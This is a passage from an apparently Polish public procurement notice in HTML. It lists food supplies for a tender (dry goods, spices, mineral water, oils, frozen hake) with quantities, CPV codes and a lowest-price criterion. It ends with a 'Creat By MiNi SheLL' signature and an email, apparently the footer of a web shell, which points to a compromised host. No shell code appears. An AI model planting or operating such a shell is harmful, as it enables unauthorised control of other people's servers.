22	Makaron op. 1 kg z parzenicy drum (spaghetti, farfalle, linguinie, penne, rigatoni, rigate, rosołowy, literki ) bez śladów uszkodzeń mechanicznych, bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości, soli/sodu wyraźnie podany termin przydatności do spożycia	-10szt.	
23	Mąka pszenna typ 450 op. 1 kg, bez śladów uszkodzeń mechanicznych, bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości sodu/soli	.	-10szt
24	fasola czerwona konserwowa op. 400 g bez śladów uszkodzeń mechanicznych, wyraźnie podany termin przydatności do spożycia, bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości sodu		-10szt.
25	Musztarda łagodna op. 450 g w opakowaniu plastikowym , bez śladów uszkodzeń mechanicznych, bez dodatku cukrów i substancji słodzących zdefiniowanych w rozporządzeniu (WE) nr 1333/2008 , o niskiej zawartości sodu/soli , wyraźnie podany termin przydatności do spożycia	-20szt.	
26	Naturalna woda mineralna nisko zmineralizowana lub średnio mineralizowana niegazowana 0,5l bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia	-500szt.	
27	Naturalna woda mineralna nisko zmineralizowana lub średnio mineralizowana niegazowana 5 l, bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia	-50szt.	
28	Ryż paraboliczny op. 1 kg, bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	-10szt.	
29	Sól o obniżonej zawartości sodu (bez antyzbrylacza) z dodatkiem potasu i magnezu, wyraźnie podany termin przydatności do spożycia, bez widocznych śladów uszkodzeń mechanicznych.	-5szt.	
30	Tuńczyk w kawałkach op. 185 g ( całe duże kawałki) w wodzie, bez śladów uszkodzeń mechanicznych, zawierające co najmniej 60% mięsa ryb, wyraźnie podany termin przydatności do spożycia.	-10szt.	
31	Barszcz czerwony w proszku 60g - oryginalne opakowania bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	20szt.	
32	barszcz czerwony w płynie 300g - oryginalne opakowania bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.		8szt.
33	Proszek do pieczenia 15g oryginalne opakowanie bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	10szt.	
34	Pieprz mielony czarny 20g - oryginalne opakowania bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	-5szt.	
35	papryka słodka 20g - oryginalne opakowanie bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	-4szt.	
36	papryka ostra 20g - oryginalne opakowanie bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	-4szt.	
37	ziele angielskie -15g oryginalne opakowanie bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	-2szt.	
38	liść laurowy 6g- oryginalne opakowanie bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	-2szt.	
39	bita śmietana w sprayu 250g bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	-6szt.	
40	bita śmietana w proszku 60gbez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	-10szt.	
41	Naturalna woda mineralna nisko zmineralizowana lub średnio mineralizowana gazowana 1,5l bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia	-60szt.	
42	kakao gorzkie sypkie do wypieków ciast 80g oryginalne opakowania bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	4szt.	
43	papryka konserwowa czerwona  720 g. szklane opakowanie oryginalne opakowania bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	10szt.	
44	pomidory w puszce w całości 400g oryginalne opakowania bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.		12szt.
45	ogórki konserwowe w całości  720g oryginalne opakowania bez śladów uszkodzeń mechanicznych wyraźnie podany termin przydatności do spożycia.	20 kg.
46	wafelki przekładane masą mix smaków w polewie czekoladowej pakowane pojedynczo		-50szt.
47	cukierki owocowe	-5 kg
48	cukierki czekoladowe	-5kg	
49	cukierki mini	-2kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> OLEJE I MARGARYNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Olej rzepakowy 1l ,rafinowany o zawartości kwasów 
jednonienasyconych powyżej 50% i zawartości kwasów 
wielonienasyconych poniżej 40%,  bez śladów uszkodzeń 
mechanicznych  wyraźnie podany termin przydatności do spożycia	-5szt.	
2.	Smalec 200g	-6szt.	
3.	Oliwa z oliwek extra virgin 0,5l,bez
śladów uszkodzeń mechanicznych,  bez śladów uszkodzeń mechanicznych  wyraźnie podany termin przydatności do spożycia	-2szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> RYBY I PRZETWORY RYBNE, MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	 Filet z Morszczuka  SHP bez glazury, świeżo mrożony,
ładnie wyporcjowany bez ości, wyraźnie oznakowany termin do spożycia mrożony 110g-170g	-18kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com